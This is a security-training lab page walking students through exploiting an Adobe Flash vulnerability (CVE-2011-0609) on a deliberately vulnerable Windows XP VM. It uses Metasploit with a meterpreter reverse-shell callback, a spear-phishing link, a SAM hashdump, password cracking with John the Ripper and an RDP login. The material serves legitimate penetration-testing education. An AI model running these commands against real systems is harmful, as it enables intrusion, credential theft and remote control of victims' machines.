ComputerSecurityStudent (CSS)

[Login]

[Join Now]

|SECURITY TOOLS >> Metasploit >> Current Page

|Views: 18566

(Metasploit: Lesson 13)

{ Illustrate Adobe Flash Player Exploit }

Section 0. Background Information

What is this Adobe Flash Player Exploit?
- This vulnerability (CVE-2011-0609) could cause a browser crash and potentially allow an attacker to take control of the affected system.
- This critical vulnerability exists in Adobe Flash Player 10.2.152.33 and earlier versions (Adobe Flash Player 10.2.154.18 and earlier for Chrome users) for Windows, Macintosh, Linux and Solaris operating systems, Adobe Flash Player 10.1.106.16 and earlier versions for Android, and the Authplay.dll component that ships with Adobe Reader and Acrobat X (10.0.1) and earlier 10.x and 9.x versions of Reader and Acrobat for Windows and Macintosh operating systems.
What is Metasploit?
- The Metasploit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world's largest database of public, tested exploits. In simple words, Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems.
What is John the Ripper?
- John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes.
What is Damn Vulnerable Windows XP?
- This is a Windows XP Virtual Machine that provides a practice environment to conduct ethical penetration testing, vulnerability assessment, exploitation and forensics investigation.
- The Microsoft Software License Terms for the IE VMs are included in the release notes.
- By downloading and using this software, you agree to these license terms.
Pre-Requisite
- Damn Vulnerable Windows XP: Lesson 1: How to create a Damn Vulnerable Windows XP Machine
- Damn Vulnerable Windows XP: Lesson 2: How to setup the Adobe Flash Player Exploit
Lab Notes
- In this lab we will do the following:
  1. Power on Damn Vulnerable WXP-SP2
  2. Power on Kali
  3. Create an Adobe Spear Phish Link and Listening
  4. Illustrated the Adobe Flash Exploit
  5. Retrieve SAM Database with hashdump
  6. Crack SAM Database with John the Ripper
  7. Remotely Connect to Vulnerable Host
Legal Disclaimer
- As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
- In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
- In addition, this is a teaching website that does not condone malicious behavior of any kind.
- You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
- © 2015 No content replication of any kind is allowed without express written permission.

Section 1: Log into Damn Vulnerable WXP-SP2

Open VMware Player on your windows machine.
- Instructions:
  1. Click the Start Button
  2. Type "vmware player" in the search box
  3. Click on VMware Player
Edit Virtual Machine Settings
- Instructions:
  1. Click on Damn Vulnerable WXP-SP2
  2. Edit Virtual Machine Settings
- Note:
  - Before beginning a lesson it is necessary to check the following VM settings.
Set Network Adapter
- Instructions:
  1. Click on Network Adapter
  2. Click on the radio button "Bridged: Connected directly to the physical network".
  3. Click the OK Button
Start Up Damn Vulnerable WXP-SP2.
- Instructions:
  1. Start Up your VMware Player
  2. Play virtual machine
Logging into Damn Vulnerable WXP-SP2.
- Instructions:
  1. Click on Administrator
  2. Password: Supply Password
    - (See Note)
  3. Press <Enter> or Click the Arrow
- Note(FYI):
  1. Password was created in (Lab 1, Section 1, Step 8)
Open the Command Prompt
- Instructions:
  1. Click the Start Button
  2. All Programs --> Accessories --> Command Prompt
Obtain Damn Vulnerable WXP-SP2's IP Address
- Instructions:
  1. ipconfig
  2. Record Your IP Address
- Note(FYI):
  - In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
  - This is the IP Address of the Victim Machine.

Section 2: Log into Kali

Open VMware Player on your windows machine.
- Instructions:
  1. Click the Start Button
  2. Type "vmware player" in the search box
  3. Click on VMware Player
Edit Virtual Machine Settings
- Instructions:
  1. Click on Kali
  2. Edit Virtual Machine Settings
- Note:
  - Before beginning a lesson it is necessary to check the following VM settings.
Configure CD/DVD
- Instructions:
  1. Click on CD/DVD
  2. Click on the radio button "Use physical drive:".
  3. Select Auto detect
Set Network Adapter
- Instructions:
  1. Click on Network Adapter
  2. Click on the radio button "Bridged: Connected directly to the physical network".
  3. Click the OK Button
Start Up Kali
- Instructions:
  1. Click on Kali
  2. Play virtual machine
Supply Username
- Instructions:
  1. Click Other...
  2. Username: root
  3. Click the Log In Button
Supply Password
- Instructions:
  1. Password: <Provide you Kali root password>
  2. Click the Log In Button
Open a Terminal Window
- Instructions:
  1. Click on Applications
  2. Accessories --> Terminal
Obtain IP Address
- Instructions:
  1. ifconfig -a
- Note(FYI):
  1. Your IP Address should be after the string "inet addr:"
  2. Mine is 192.168.1.109
  3. Please record your IP Address

Section 3: It's Metasploit Time

Start the Metasploit Framework Console
- Instructions:
  1. msfconsole
Set Exploit
- Instructions:
  1. use exploit/windows/browser/adobe_flashplayer_avm
- Note(FYI):
  1. The is the exploit that will be used to demonstrated the adobe flash vulnerability.
Set Payload
- Instructions:
  1. set PAYLOAD windows/meterpreter/reverse_tcp
- Note(FYI):
  1. This payload will provide the conduit to send the stage and establish a tcp connection from the victim back to the attacker.
Show Options
- Instructions:
  1. show options
- Note(FYI):
  1. Notice there is a "yes" under the required column for both SRVHOST and LHOST.
  2. Accordingly, we will set those IP Addresses next.
Set Listener IP Address
- Instructions:
  1. set SRVHOST 192.168.1.109
  2. set LHOST 192.168.1.109
  3. set URIPATH adobe_exploit.html
- Note(FYI):
  1. Replace 192.168.1.109 with your Kali IP Address found in (Section 2, Step 9).
  2. SRVHOST and LHOST is the listening Address
  3. URIPATH is the name of the webpage
Start Listener
- Instructions:
  1. exploit
  2. Highlight the link and right click.
    - E.g., http://192.168.1.109:8080/adobe_exploit.html
  3. Select Copy
- Note(FYI):
  1. Replace 192.168.1.109 with your Kali IP Address found in (Section 2, Step 9).
  2. Continue to next step.

Section 4: Illustrate Exploit

Open Internet Explorer (On Damn Vulnerable WXP-SP2)
- Instructions:
  1. Click the Start Button
  2. All Programs --> Internet Explorer
Place Victim Link
- Instructions:
  1. Paste the URL you copied from (Section 3, Step 6) in the address bar.
    - E.g., http://192.168.1.109:8080/adobe_exploit.html
  2. Notice an image or something appears to be loading
  3. Notice that status bar appears to be 100%, but will not complete.
- Note(FYI):
  1. Replace 192.168.1.109 with your Kali IP Address found in (Section 2, Step 9).
  2. Normally, this malicious link would typically be embedded in an email, document, spreadsheet, which is also known as Spear Fishing.
  3. Continue to next step
Watch Exploit In Progress (On Kali)
- Note(FYI):
  1. You need to be patient. It takes 3 to 5 minutes to send and execute the stage. (i.e., nothing will happen for 3 to 5 minutes.)
  2. After you see the Successfully migrated message you will notice that Internet Explorer on Damn Vulnerable WXP-SP2 closed.
- Instructions:
  1. Record your IEXPLORE.exe PID
  2. Record your notepad.exe PID
  3. Press <Enter> after you see the Successfully migrated message.
Where's Internet Exploder? (On Damn Vulnerable WXP-SP2)
- Note(FYI):
  1. As Promised Internet Explo[d]er died.
  2. Or did it?
  3. Continue to next step.

Section 5: Basic Forensics Investigation

Open a Command Prompt (On Damn Vulnerable WXP-SP2)
- Instructions:
  1. Click the Start Button
  2. All Programs --> Command Prompt
Analyze Processes with tasklist
- Instructions:
  1. tasklist
  2. tasklist | findstr "908"
    - Replace 908 with your IEXPLORE.EXE PID from (Section 4, Step 18).
  3. tasklist | findstr "1992"
    - Replace 1992 with your notepad.exe PID from (Section 4, Step 18).
- Note(FYI):
  1. Although Internet Explorer appears to have closed/died, the Process ID still exists.
  2. Also, notice that the memory usage is relatively high. So, something is going on.
Analyze Processes with netstat
- Instructions:
  1. netstat -ano
  2. netstat -ano | findstr "908"
    - Replace 908 with your IEXPLORE.EXE PID from (Section 4, Step 18).
- Note(FYI):
  1. Notice the TCP connection between the Victim and Kali that it not over the http port of 8080 that the malicious link was originaly listening on. (E.g., http://192.168.1.109:8080/adobe_exploit.html)

Section 6: Perform hashdump and John the Ripper

Interact with Meterpreter Session (On Kali)
- Instructions:
  1. sessions -l
    - "l" as in lowercase "L"
  2. sessions -i 1
    - "1" as in the number one.
- Note(FYI):
  1. sessions -l, List all active sessions.
  2. sessions -i 1, Interact with the supplied session ID(1).
Display Commands
- Instructions:
  1. help
- Note(FYI):
  1. help, display all the possible commands.
Hashdump
- Instructions:
  1. hashdump
  2. Highlight the output produced by hashdump.
  3. Edit --> Copy
  4. Click the Terminal Icon
- Note(FYI):
  1. The 'hashdump' post module will dump the contents of the SAM database.
Save Hashdump Contents (Part 1)
- Instructions:
  1. cd /var/tmp
  2. vi adobe_exploit.txt
- Note(FYI):
  1. vi, is an old school text editor for the programmer hacker types.
Save Hashdump Contents (Part 2)
- Instructions:
  1. Press the "i" key to enter into INSERT Mode.
  2. Edit --> Paste
Save Hashdump Contents (Part 3)
- Instructions:
  1. Press the <Esc> key to exit into INSERT Mode.
  2. Type ":wq!" to save the file
  3. Press the <Enter> key.
John the Ripper
- Instructions:
  1. egrep -i '(admin|student)' adobe_exploit.txt > adobe_exploit_users.txt
  2. cat adobe_exploit_users.txt
  3. cat /dev/null > /root/.john/john.pot
  4. john --format=nt adobe_exploit_users.txt | tee adobe_exploit_passwords.txt
- Note(FYI):
  1. Command #1, Extract the lines that contain admin and/or student from the (adobe_exploit.txt) file and place the output in the(adobe_exploit_users.txt) file.
  2. Command #2, Display the contents of the (adobe_exploit_users.txt) file.
  3. Command #3, Use the command (cat /dev/null) to clear the John The Ripper history file (/root/.john/john.pot) by using the redirect operator (>).
  4. Command #4, Use John The Ripper to crack the (adobe_exploit_users.txt) file. The flag (--format=nt) tells John The Ripper the password format type is nt.

Section 7: Remotely Connect to Victim

rdesktop
- Instructions:
  1. rdesktop -g 80% -u Administrator -p abc123 192.168.1.116 &
- Note(FYI):
  1. Replace 192.168.1.116 with the IP Address of your Damn Vulnerable WXP-SP2 machine found in (Section 1, Step 7).
  2. rdesktop is a client for Remote Desktop Protocol (RDP).
rdesktop
- Instructions:
  1. Notice you are able to remotely access the start menu of the Damn Vulnerable WXP-SP2 machine.
- Note(FYI):
  1. Pretty kool right?

Section 8: Proof of Lab

Proof of Lab (On Kali)
- Instructions:
  1. Click on the second terminal window (See Picture)
  2. cat /var/tmp/adobe_exploit_passwords.txt
  3. date
  4. echo "Your Name"
  5. ps -eaf | grep rdesktop | grep -v grep
- Proof of Lab Instructions
  1. Press the <Ctrl> and <Alt> key at the same time.
  2. Press the <PrtScn> key.
  3. Paste into a word document
  4. Upload to Moodle

rm -rf windows Shirt
$25
Buy Now
(See More)